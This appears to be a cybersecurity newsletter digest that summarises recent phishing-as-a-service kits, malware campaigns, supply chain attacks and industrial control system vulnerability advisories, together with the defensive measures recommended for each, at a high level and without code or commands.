Hello, stay ahead with CISO Brief 🚀

🔒 This AWS Security blog post outlines best practices for defending against software supply chain attacks, motivated by recent npm incidents like Shai‑Hulud and axios. It emphasizes reducing long‑lived credentials by using temporary credentials (AWS CLI login, IAM Identity Center, OIDC) and centralizing secrets with AWS Secrets Manager or Systems Manager Parameter Store. The article advocates layered defenses including MFA, multi‑approver workflows, artifact signing with AWS Signer, central package repositories using CodeArtifact, image scanning with Amazon Inspector, and provenance attestations for npm packages.

🔒 The FBI has alerted organisations to Kali365, a phishing-as-a-service platform that can hijack Microsoft 365 accounts without stealing passwords and can bypass multi-factor authentication. Launched in April 2026 and sold via Telegram, Kali365 offers AI-generated lures, automated templates, dashboards, and OAuth token capture for as little as $250 monthly. The kit exploits Microsoft’s device code flow, tricking victims into authorising attacker devices on legitimate Microsoft pages, granting access to Outlook, Teams, and OneDrive. The FBI recommends blocking device code flow with a conditional access policy in Microsoft Entra ID and deploying phishing-resistant MFA such as hardware security keys.

📡 Google details how its global network and new data center fabrics are being redesigned for AI workloads, describing a vertically integrated stack anchored by an AI Hypercomputer. The post highlights Virgo Network, campus-scale and WAN innovations, and AI-native Cloud Interconnect to meet extreme bandwidth, low latency, and burst tolerance requirements. It emphasizes co-design with accelerators, autonomous reliability features, and global footprint benefits for inference and cross-site training.

📡 Researchers show WiFi signals can reveal people and environments by analyzing how radio waves reflect, scatter, and absorb compared with expected patterns. WiFi sensing uses these variations to infer spatial structure and presence, effectively creating an image of surroundings and occupants. Thorsten Strufe of KIT explains it functions like a camera, but with radio waves instead of light, enabling recognition through signal propagation analysis.

🛡️ Google researchers report a rapid rise in Chinese phishing-as-a-service (PhaaS) operations that have shifted from static password harvesting to real-time credential interception and tokenization. These services use encrypted messaging protocols like RCS and iMessage to deliver convincing lures and employ live admin panels to capture OTPs and bypass MFA. Platforms also monetize stolen payment details via digital wallet provisioning and increasingly leverage AI to generate unique phishing pages and evade detection.

🔒 Researchers at SafeDep uncovered the Megalodon campaign that pushed 5,718 malicious commits into 5,561 public GitHub repositories during a six-hour window on May 18. The attackers modified GitHub Actions workflows to embed base64-encoded bash payloads designed to exfiltrate CI-exposed secrets such as cloud credentials, SSH keys, and OIDC tokens. The campaign used compromised Personal Access Tokens or deploy keys and forged author identities like build-bot to directly commit changes without PRs, and delivered two payload variants that either ran on every push or via workflow_dispatch triggers.

🛡️ ESET researchers identified a no-code Android remote access trojan (RAT) named BTMOB that is distributed via phishing campaigns and fake app stores. The malware includes an APK builder so buyers can produce customized payloads quickly and retool lures for different countries without coding. BTMOB abuses Android Accessibility Services to escalate permissions and enable data theft, screenshots, activity recording and full remote control. Sold as a malware-as-a-service offering with relatively low pricing, it lowers the barrier for criminals and allows rapid variant turnover.

🛡️ FortiGuard Labs uncovered a phishing campaign using purchase-order-themed emails to deliver a RAR attachment containing an obfuscated JavaScript file that drops and executes a PowerShell script. The PowerShell payload employs fileless techniques and process hollowing to load .NET modules into a suspended MsBuild.exe process, which then extracts and runs a downloader module. The downloader retrieves a fileless PureLogs plugin from a C2 server to harvest credentials, browser data, Discord tokens, and cryptocurrency wallet information before encrypting and exfiltrating it.

🛡️ This update describes Check Point’s Frontier AI Models Readiness Program and the resulting Jumbo Security Release. It outlines an AI-driven, multi-repository code-scanning initiative called BLAST that provides contextual, architecture-aware analysis to find exploitable vulnerabilities. The release includes dozens of hardening improvements and targeted fixes for multiple CVEs, and customers are urged to update to benefit from the protections.

🔒 The 2026 Cloud Security Report finds AI adoption has surged into production, but security architectures are lagging. While many organizations have updated strategies, few possess the architectural capability to enforce them, leaving AI systems and data exposed. The report calls for unified hybrid security architectures delivering consistent visibility, policy enforcement, and runtime controls across cloud, SaaS, and on-premises environments.

🛡️ Microsoft is previewing a Defender for Endpoint capability that automatically isolates compromised endpoints as part of automatic attack disruption. Isolated devices are disconnected from the network to limit lateral movement and data exfiltration but remain connected to the Microsoft Defender for Endpoint service for ongoing monitoring. The feature applies to onboarded end-user workstations and can be released by security operators after investigation and remediation.

🔒 ABB has identified a vulnerability in affected versions of the ABB Ability™ zenon Remote Transport Service that permits unauthorized use of the Reboot OS function, allowing an attacker to trigger a system reboot without required authentication. Remote exploitation requires prior access to the target network. Vendors report no evidence of active exploitation at this time. Workarounds include restricting network access and disabling the zensyssrv.exe service when Remote Transport is not needed.

🛡️ The advisory details a buffer over-read vulnerability in ABB AC500 V2 devices that can cause Modbus server responses to include fragments of earlier telegrams. Affected devices running older firmware may return invalid or appended data when presented with unsupported Modbus function codes. ABB issued a fix in AC500 V2 firmware version 2.5.3 (2016) and later; operators are urged to update and minimize network exposure. CISA republished the vendor advisory to raise visibility and recommends isolating control networks and using secure remote access.

🔒 An Improper Resource Locking vulnerability in the System Diagnostics Manager (SDM) of B&R Automation Runtime versions before 6.3 and before Q4.93 may allow an unauthenticated network attacker to delete data and cause denial of service. The vendor corrected the issue in Automation Runtime 6.3 and Q4.93 and notes SDM is disabled by default in AR 6. B&R recommends applying updates, restricting SDM access, using TLS/mutual TLS, and limiting webserver access to trusted IPs.

🔒 ABB reported a heap-based buffer overflow in select Terra AC EV chargers that can be triggered via crafted OCPP messages. Exploitation may allow heap pollution, denial-of-service, altered firmware behavior, or possible remote code execution; the vendor has released patched firmware versions. ABB strongly recommends avoiding unencrypted HTTP for OCPP connections and applying updates promptly to mitigate remote exploitation risks.

🔔 ABB disclosed that several vulnerabilities exist in the VLC media player component delivered with older ABB Ability Camera Connect installers (≤ 1.5.0.14). An update (Camera Connect 1.5.0.15) and standalone VLC updates are available to remediate multiple memory-corruption and path-related issues. ABB notes that most deployments are air-gapped and isolated, which significantly reduces exposure and remote exploitability, but recommends applying updates at the earliest convenience.

🔒 The Eppendorf BioFlo 320 is affected by a high‑severity vulnerability (CVSS 9.8) due to a VNC server that uses a hard‑coded password. If remote access is enabled and an attacker knows the device's network address, they can gain full control of the controller interface; VNC traffic is unencrypted. Eppendorf has released Version 5.0 software that removes VNC access and urges users to verify VNC is disabled and restrict configuration changes to Admin and Supervisor roles.

🔒 ABB disclosed a vulnerability in MConfig affecting versions listed by the vendor that allows sensitive data to be stored in cleartext in memory. An attacker with physical or local host access could export a memory dump that may include plaintext passwords. ABB released MConfig version 1.4.9.22 to remediate the issue and recommends applying defensive measures from the product manual.